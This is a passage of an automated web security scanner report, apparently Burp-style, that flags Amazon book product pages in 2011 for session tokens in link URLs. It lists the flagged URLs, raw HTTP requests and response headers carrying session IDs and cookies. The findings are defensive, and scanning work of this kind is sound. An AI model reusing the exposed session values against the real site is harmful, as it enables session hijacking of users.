<a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/RBKOFMQCA9K6F/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=DEBBAD29F1E4EF197B389FB5C86C202273418E26&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDQ3MDY1MDkyMy9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZpc1NSQWRtaW49&voteAnchorName=RBKOFMQCA9K6F.2115.Helpful.Reviews&voteSessionID=181-4491985-5345663"><span class="cmtySprite s_largeNo " >
...[SNIP]...
<nobr><a rel="nofollow" class="reportingButton" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/RBKOFMQCA9K6F/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=6E2B0E141A950C12A1E0716EC94D5E45A04F01B6&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDQ3MDY1MDkyMy9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZpc1NSQWRtaW49&voteAnchorName=RBKOFMQCA9K6F.2115.Inappropriate.Reviews&voteSessionID=181-4491985-5345663"
>Report abuse</a>
...[SNIP]...
</span><a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R5IOGQXSAO3Y6/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=282E89A0EE70EE633F6F8C0F4D12DE05950BCFEB&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDQ3MDY1MDkyMy9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZpc1NSQWRtaW49&voteAnchorName=R5IOGQXSAO3Y6.2115.Helpful.Reviews&voteSessionID=181-4491985-5345663"><span class="cmtySprite s_largeYes " >
...[SNIP]...
</a>
<a rel="nofollow" class="votingButtonReviews" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R5IOGQXSAO3Y6/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=BC772305F27C460C702988070CFF7CF42E798E6D&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDQ3MDY1MDkyMy9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZpc1NSQWRtaW49&voteAnchorName=R5IOGQXSAO3Y6.2115.Helpful.Reviews&voteSessionID=181-4491985-5345663"><span class="cmtySprite s_largeNo " >
...[SNIP]...
<nobr><a rel="nofollow" class="reportingButton" href="http://www.amazon.com/gp/voting/cast/Reviews/2115/R5IOGQXSAO3Y6/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=949CE8B36BE4EA4C9C2C9469C7C0601236CC2DA9&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDQ3MDY1MDkyMy9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZpc1NSQWRtaW49&voteAnchorName=R5IOGQXSAO3Y6.2115.Inappropriate.Reviews&voteSessionID=181-4491985-5345663"
>Report abuse</a>
...[SNIP]...
<li><a href="/gp/redirect.html/ref=gw_m_b_ir/181-4491985-5345663?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-irhome%26c%3D97664&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8">Investor Relations</a>
...[SNIP]...
<li><a href="/gp/redirect.html/ref=gw_m_b_pr/181-4491985-5345663?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-mediaHome%26c%3D176060&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8">Press Releases</a>
...[SNIP]...
<li><a href="/gp/redirect.html/181-4491985-5345663?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fsell-on-amazon.htm%3Fld%3DAZFSSOA&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8">Sell on Amazon</a>
...[SNIP]...
<li><a href="/gp/redirect.html/181-4491985-5345663?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fproduct-ads-on-amazon.htm%3Fld%3DAZPADSFooter&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8">Advertise Your Products</a>
...[SNIP]...

11.15. http://www.amazon.com/gp/product/0672333368 previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.amazon.com
Path:	/gp/product/0672333368

Issue detail

The response contains the following links that appear to contain session tokens:

http://www.amazon.com/gp/redirect.html/185-0119564-6236271?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fproduct-ads-on-amazon.htm%3Fld%3DAZPADSFooter&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8
http://www.amazon.com/gp/redirect.html/185-0119564-6236271?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fsell-on-amazon.htm%3Fld%3DAZFSSOA&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8
http://www.amazon.com/gp/redirect.html/ref=cm_sw_cl_fa_idp_Dlkrnb0VMPJZJ?token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1&location=http%3A%2F%2Fwww.facebook.com%2Fshare.php%3Fu%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2F0672333368%2Fref%3Dcm_sw_r_fa_idp_Dlkrnb0VMPJZJ%26bodytext%3DSilverlight%25204%2520Unleashed%2520by%2520Laurent%2520Bugnion
http://www.amazon.com/gp/redirect.html/ref=cm_sw_cl_tw_idp_Dlkrnb0VMPJZJ?token=7A1A4AE8F6CE0BD277D8295E58702D283F329C0F&location=http%3A%2F%2Ftwitter.com%2Fshare%3Foriginal_referer%3Dhttp%253A%252F%252Fwww.amazon.com%252Fgp%252Fproduct%252F0672333368%252Fref%253Dcm_sw_r_tw_idp_Dlkrnb0VMPJZJ%26related%3Damazondeals%2Camazonmp3%26via%3Damazon%26text%3DSilverlight%25204%2520Unleashed%2520by%2520Laurent%2520Bugnion%26url%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2F0672333368%2Fref%3Dcm_sw_r_tw_idp_Dlkrnb0VMPJZJ%26count%3Dnone
http://www.amazon.com/gp/redirect.html/ref=gw_m_b_ir/185-0119564-6236271?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-irhome%26c%3D97664&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8
http://www.amazon.com/gp/redirect.html/ref=gw_m_b_pr/185-0119564-6236271?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-mediaHome%26c%3D176060&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8
http://www.amazon.com/gp/voting/cast/Reviews/2115/R32D724UGWFC5B/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=2E112C5387CD101DB45B6C7A7C0D27FD14A9EC76&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDY3MjMzMzM2OC9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZ0YWc9dmFyaW91c3NpdGUwNy0yMCZsaW5rQ29kZT1hczImY2FtcD0xNzg5JmlzU1JBZG1pbj0mY3JlYXRpdmU9OTMyNSZjcmVhdGl2ZUFTSU49MDY3MjMzMzM2OA&voteAnchorName=R32D724UGWFC5B.2115.Helpful.Reviews&voteSessionID=185-0119564-6236271
http://www.amazon.com/gp/voting/cast/Reviews/2115/R32D724UGWFC5B/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=4BDB817971AE138F256933C59ACFA3BBF258D6CC&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDY3MjMzMzM2OC9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZ0YWc9dmFyaW91c3NpdGUwNy0yMCZsaW5rQ29kZT1hczImY2FtcD0xNzg5JmlzU1JBZG1pbj0mY3JlYXRpdmU9OTMyNSZjcmVhdGl2ZUFTSU49MDY3MjMzMzM2OA&voteAnchorName=R32D724UGWFC5B.2115.Helpful.Reviews&voteSessionID=185-0119564-6236271
http://www.amazon.com/gp/voting/cast/Reviews/2115/R32D724UGWFC5B/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=13F44D8DB85E62AB513A2FC8BB0759865CE7242B&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDY3MjMzMzM2OC9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZ0YWc9dmFyaW91c3NpdGUwNy0yMCZsaW5rQ29kZT1hczImY2FtcD0xNzg5JmlzU1JBZG1pbj0mY3JlYXRpdmU9OTMyNSZjcmVhdGl2ZUFTSU49MDY3MjMzMzM2OA&voteAnchorName=R32D724UGWFC5B.2115.Inappropriate.Reviews&voteSessionID=185-0119564-6236271
http://www.amazon.com/gp/voting/cast/Reviews/2115/R3BROO1V9I984R/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=0DC2B6271ED508733470ABA22F641A25BE550680&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDY3MjMzMzM2OC9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZ0YWc9dmFyaW91c3NpdGUwNy0yMCZsaW5rQ29kZT1hczImY2FtcD0xNzg5JmlzU1JBZG1pbj0mY3JlYXRpdmU9OTMyNSZjcmVhdGl2ZUFTSU49MDY3MjMzMzM2OA&voteAnchorName=R3BROO1V9I984R.2115.Helpful.Reviews&voteSessionID=185-0119564-6236271
http://www.amazon.com/gp/voting/cast/Reviews/2115/R3BROO1V9I984R/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=9CC4FDA7A405678ED5366A2FB935E7D9CF93DECC&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDY3MjMzMzM2OC9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZ0YWc9dmFyaW91c3NpdGUwNy0yMCZsaW5rQ29kZT1hczImY2FtcD0xNzg5JmlzU1JBZG1pbj0mY3JlYXRpdmU9OTMyNSZjcmVhdGl2ZUFTSU49MDY3MjMzMzM2OA&voteAnchorName=R3BROO1V9I984R.2115.Helpful.Reviews&voteSessionID=185-0119564-6236271
http://www.amazon.com/gp/voting/cast/Reviews/2115/R3BROO1V9I984R/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=19B93DD68EB2AACD5FF3F0E1AEE9AFA692C107CC&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDY3MjMzMzM2OC9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZ0YWc9dmFyaW91c3NpdGUwNy0yMCZsaW5rQ29kZT1hczImY2FtcD0xNzg5JmlzU1JBZG1pbj0mY3JlYXRpdmU9OTMyNSZjcmVhdGl2ZUFTSU49MDY3MjMzMzM2OA&voteAnchorName=R3BROO1V9I984R.2115.Inappropriate.Reviews&voteSessionID=185-0119564-6236271
http://www.amazon.com/gp/voting/cast/Reviews/2115/RQBNVCBIA1AXY/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=010B1555D8A061B20D011F6025C060402583CB6B&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDY3MjMzMzM2OC9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZ0YWc9dmFyaW91c3NpdGUwNy0yMCZsaW5rQ29kZT1hczImY2FtcD0xNzg5JmlzU1JBZG1pbj0mY3JlYXRpdmU9OTMyNSZjcmVhdGl2ZUFTSU49MDY3MjMzMzM2OA&voteAnchorName=RQBNVCBIA1AXY.2115.Helpful.Reviews&voteSessionID=185-0119564-6236271
http://www.amazon.com/gp/voting/cast/Reviews/2115/RQBNVCBIA1AXY/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=C942A1E3444D734342B81B20F2619286001AC621&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDY3MjMzMzM2OC9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZ0YWc9dmFyaW91c3NpdGUwNy0yMCZsaW5rQ29kZT1hczImY2FtcD0xNzg5JmlzU1JBZG1pbj0mY3JlYXRpdmU9OTMyNSZjcmVhdGl2ZUFTSU49MDY3MjMzMzM2OA&voteAnchorName=RQBNVCBIA1AXY.2115.Helpful.Reviews&voteSessionID=185-0119564-6236271
http://www.amazon.com/gp/voting/cast/Reviews/2115/RQBNVCBIA1AXY/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=1734E01A885D6EED9DD3D9FA6103D15AEE210C64&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMDY3MjMzMzM2OC9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZ0YWc9dmFyaW91c3NpdGUwNy0yMCZsaW5rQ29kZT1hczImY2FtcD0xNzg5JmlzU1JBZG1pbj0mY3JlYXRpdmU9OTMyNSZjcmVhdGl2ZUFTSU49MDY3MjMzMzM2OA&voteAnchorName=RQBNVCBIA1AXY.2115.Inappropriate.Reviews&voteSessionID=185-0119564-6236271

Request

GET /gp/product/0672333368?ie=UTF8&tag=varioussite07-20&linkCode=as2&camp=1789&creative=9325&creativeASIN=0672333368 HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.16. http://www.amazon.com/gp/product/0981511821 previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.amazon.com
Path:	/gp/product/0981511821

Issue detail

The response contains the following links that appear to contain session tokens:

http://www.amazon.com/gp/redirect.html/177-1907126-9874658?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fproduct-ads-on-amazon.htm%3Fld%3DAZPADSFooter&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8
http://www.amazon.com/gp/redirect.html/177-1907126-9874658?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fsell-on-amazon.htm%3Fld%3DAZFSSOA&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8
http://www.amazon.com/gp/redirect.html/ref=cm_sw_cl_fa_idp_xmkrnb0BDP91Z?token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1&location=http%3A%2F%2Fwww.facebook.com%2Fshare.php%3Fu%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2F0981511821%2Fref%3Dcm_sw_r_fa_idp_xmkrnb0BDP91Z%26bodytext%3DSilverlight%25204%2520Jumpstart%2520by%2520David%2520Yack
http://www.amazon.com/gp/redirect.html/ref=cm_sw_cl_tw_idp_xmkrnb0BDP91Z?token=7A1A4AE8F6CE0BD277D8295E58702D283F329C0F&location=http%3A%2F%2Ftwitter.com%2Fshare%3Foriginal_referer%3Dhttp%253A%252F%252Fwww.amazon.com%252Fgp%252Fproduct%252F0981511821%252Fref%253Dcm_sw_r_tw_idp_xmkrnb0BDP91Z%26related%3Damazondeals%2Camazonmp3%26via%3Damazon%26text%3DSilverlight%25204%2520Jumpstart%2520by%2520David%2520Yack%26url%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2F0981511821%2Fref%3Dcm_sw_r_tw_idp_xmkrnb0BDP91Z%26count%3Dnone
http://www.amazon.com/gp/redirect.html/ref=dtp_dp_lm_0981511821/177-1907126-9874658?location=http://dtp.amazon.com/&token=ED7546842AF86000862C6B4CDB683D114A0EDF07
http://www.amazon.com/gp/redirect.html/ref=gw_m_b_ir/177-1907126-9874658?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-irhome%26c%3D97664&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8
http://www.amazon.com/gp/redirect.html/ref=gw_m_b_pr/177-1907126-9874658?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-mediaHome%26c%3D176060&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8

Request

GET /gp/product/0981511821 HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:30:30 GMT
Server: Server
x-amz-id-1: 0XB1D4PZ9419ZYHZPFK1
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: paCmRy1sJia9Yo22kUbZJqup3sUmP5UPhjF9KZKfoPPtyZa2vqwpTeDVQZrYvCgc
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=177-1907126-9874658; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 325743

<html>
<head>

<style type="text/css"><!--

BODY { font-
...[SNIP]...
</a><a href="/gp/redirect.html/ref=cm_sw_cl_fa_idp_xmkrnb0BDP91Z?token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1&location=http%3A%2F%2Fwww.facebook.com%2Fshare.php%3Fu%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2F0981511821%2Fref%3Dcm_sw_r_fa_idp_xmkrnb0BDP91Z%26bodytext%3DSilverlight%25204%2520Jumpstart%2520by%2520David%2520Yack" target="_blank" onclick="window.open('/gp/redirect.html/ref=cm_sw_cl_fa_idp_xmkrnb0BDP91Z?token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1&location=http%3A%2F%2Fwww.facebook.com%2Fshare.php%3Fu%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2F0981511821%2Fref%3Dcm_sw_r_fa_idp_xmkrnb0BDP91Z%26bodytext%3DSilverlight%25204%2520Jumpstart%2520by%2520David%2520Yack', '_blank', 'location=yes,width=700,height=400');return false;"><span class="tafSocialButton" style="background-position: 0 -1px; height: 15px; width: 15px;">
...[SNIP]...
</a><a href="/gp/redirect.html/ref=cm_sw_cl_tw_idp_xmkrnb0BDP91Z?token=7A1A4AE8F6CE0BD277D8295E58702D283F329C0F&location=http%3A%2F%2Ftwitter.com%2Fshare%3Foriginal_referer%3Dhttp%253A%252F%252Fwww.amazon.com%252Fgp%252Fproduct%252F0981511821%252Fref%253Dcm_sw_r_tw_idp_xmkrnb0BDP91Z%26related%3Damazondeals%2Camazonmp3%26via%3Damazon%26text%3DSilverlight%25204%2520Jumpstart%2520by%2520David%2520Yack%26url%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2F0981511821%2Fref%3Dcm_sw_r_tw_idp_xmkrnb0BDP91Z%26count%3Dnone" target="_blank" onclick="window.open('/gp/redirect.html/ref=cm_sw_cl_tw_idp_xmkrnb0BDP91Z?token=7A1A4AE8F6CE0BD277D8295E58702D283F329C0F&location=http%3A%2F%2Ftwitter.com%2Fshare%3Foriginal_referer%3Dhttp%253A%252F%252Fwww.amazon.com%252Fgp%252Fproduct%252F0981511821%252Fref%253Dcm_sw_r_tw_idp_xmkrnb0BDP91Z%26related%3Damazondeals%2Camazonmp3%26via%3Damazon%26text%3DSilverlight%25204%2520Jumpstart%2520by%2520David%2520Yack%26url%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2F0981511821%2Fref%3Dcm_sw_r_tw_idp_xmkrnb0BDP91Z%26count%3Dnone', '_blank', 'location=yes,width=700,height=400');return false;"><span class="tafSocialButton" style="background-position: -15px -1px; height: 15px; width: 15px;">
...[SNIP]...
<div class="content">
If you are a publisher or author and hold the digital rights to a book, you can sell a digital version of it in our Kindle Store.
<a href="/gp/redirect.html/ref=dtp_dp_lm_0981511821/177-1907126-9874658?location=http://dtp.amazon.com/&token=ED7546842AF86000862C6B4CDB683D114A0EDF07">Learn more</a>
...[SNIP]...
<li><a href="/gp/redirect.html/ref=gw_m_b_ir/177-1907126-9874658?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-irhome%26c%3D97664&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8">Investor Relations</a>
...[SNIP]...
<li><a href="/gp/redirect.html/ref=gw_m_b_pr/177-1907126-9874658?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-mediaHome%26c%3D176060&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8">Press Releases</a>
...[SNIP]...
<li><a href="/gp/redirect.html/177-1907126-9874658?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fsell-on-amazon.htm%3Fld%3DAZFSSOA&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8">Sell on Amazon</a>
...[SNIP]...
<li><a href="/gp/redirect.html/177-1907126-9874658?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fproduct-ads-on-amazon.htm%3Fld%3DAZPADSFooter&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8">Advertise Your Products</a>
...[SNIP]...

11.17. http://www.amazon.com/gp/product/184968006X previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.amazon.com
Path:	/gp/product/184968006X

Issue detail

The response contains the following links that appear to contain session tokens:

http://www.amazon.com/gp/redirect.html/180-2237308-2659866?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fproduct-ads-on-amazon.htm%3Fld%3DAZPADSFooter&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8
http://www.amazon.com/gp/redirect.html/180-2237308-2659866?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fsell-on-amazon.htm%3Fld%3DAZFSSOA&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8
http://www.amazon.com/gp/redirect.html/ref=cm_sw_cl_fa_dp_nmkrnb0KCN66A?token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1&location=http%3A%2F%2Fwww.facebook.com%2Fshare.php%3Fu%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2F184968006X%2Fref%3Dcm_sw_r_fa_dp_nmkrnb0KCN66A%26bodytext%3DMicrosoft%2520Silverlight%25204%2520and%2520SharePoint%25202010%2520Integration%2520by%2520Gaston%2520C.%2520Hillar
http://www.amazon.com/gp/redirect.html/ref=cm_sw_cl_tw_dp_nmkrnb0KCN66A?token=7A1A4AE8F6CE0BD277D8295E58702D283F329C0F&location=http%3A%2F%2Ftwitter.com%2Fshare%3Foriginal_referer%3Dhttp%253A%252F%252Fwww.amazon.com%252Fgp%252Fproduct%252F184968006X%252Fref%253Dcm_sw_r_tw_dp_nmkrnb0KCN66A%26related%3Damazondeals%2Camazonmp3%26via%3Damazon%26text%3DMicrosoft%2520Silverlight%25204%2520and%2520SharePoint%25202010%2520Integration%2520by%2520Gaston%2520C.%2520Hillar%26url%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2F184968006X%2Fref%3Dcm_sw_r_tw_dp_nmkrnb0KCN66A%26count%3Dnone
http://www.amazon.com/gp/redirect.html/ref=dtp_dp_lm_184968006X/180-2237308-2659866?location=http://dtp.amazon.com/&token=ED7546842AF86000862C6B4CDB683D114A0EDF07
http://www.amazon.com/gp/redirect.html/ref=gw_m_b_ir/180-2237308-2659866?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-irhome%26c%3D97664&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8
http://www.amazon.com/gp/redirect.html/ref=gw_m_b_pr/180-2237308-2659866?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-mediaHome%26c%3D176060&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8
http://www.amazon.com/gp/voting/cast/Reviews/2115/R11J3G9XYVOT3B/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=39C1FB4A30BAA4BF73279374D7DC87858E61D96F&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMTg0OTY4MDA2WC9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZ0YWc9c2lsdmVybGlnaHRuZXQtMjAmbGlua0NvZGU9eG0yJmNhbXA9MTc4OSZpc1NSQWRtaW49JmNyZWF0aXZlQVNJTj0xODQ5NjgwMDZY&voteAnchorName=R11J3G9XYVOT3B.2115.Helpful.Reviews&voteSessionID=180-2237308-2659866
http://www.amazon.com/gp/voting/cast/Reviews/2115/R11J3G9XYVOT3B/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=C528D74CE108B51ADF700EDE9B58756F117A6778&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMTg0OTY4MDA2WC9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZ0YWc9c2lsdmVybGlnaHRuZXQtMjAmbGlua0NvZGU9eG0yJmNhbXA9MTc4OSZpc1NSQWRtaW49JmNyZWF0aXZlQVNJTj0xODQ5NjgwMDZY&voteAnchorName=R11J3G9XYVOT3B.2115.Helpful.Reviews&voteSessionID=180-2237308-2659866
http://www.amazon.com/gp/voting/cast/Reviews/2115/R11J3G9XYVOT3B/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=4DD433FE7637EE1BE3766B94B047C4A371A9C8B8&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMTg0OTY4MDA2WC9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZ0YWc9c2lsdmVybGlnaHRuZXQtMjAmbGlua0NvZGU9eG0yJmNhbXA9MTc4OSZpc1NSQWRtaW49JmNyZWF0aXZlQVNJTj0xODQ5NjgwMDZY&voteAnchorName=R11J3G9XYVOT3B.2115.Inappropriate.Reviews&voteSessionID=180-2237308-2659866
http://www.amazon.com/gp/voting/cast/Reviews/2115/R1RHEGL50Q9KBE/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=34E5070F33D26B6EC34A2C2DCF086842CE9AC262&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMTg0OTY4MDA2WC9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZ0YWc9c2lsdmVybGlnaHRuZXQtMjAmbGlua0NvZGU9eG0yJmNhbXA9MTc4OSZpc1NSQWRtaW49JmNyZWF0aXZlQVNJTj0xODQ5NjgwMDZY&voteAnchorName=R1RHEGL50Q9KBE.2115.Helpful.Reviews&voteSessionID=180-2237308-2659866
http://www.amazon.com/gp/voting/cast/Reviews/2115/R1RHEGL50Q9KBE/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=76717228FE30975E8AF64100357ADF4AF0BC2AF1&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvMTg0OTY4MDA2WC9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmcmVkaXJlY3Q9dHJ1ZSZ0YWc9c2lsdmVybGlnaHRuZXQtMjAmbGlua0NvZGU9eG0yJmNhbXA9MTc4OSZpc1NSQWRtaW49JmNyZWF0aXZlQVNJTj0xODQ5NjgwMDZY&voteAnchorName=R1RHEGL50Q9KBE.2115.Helpful.Reviews&voteSessionID=180-2237308-2659866
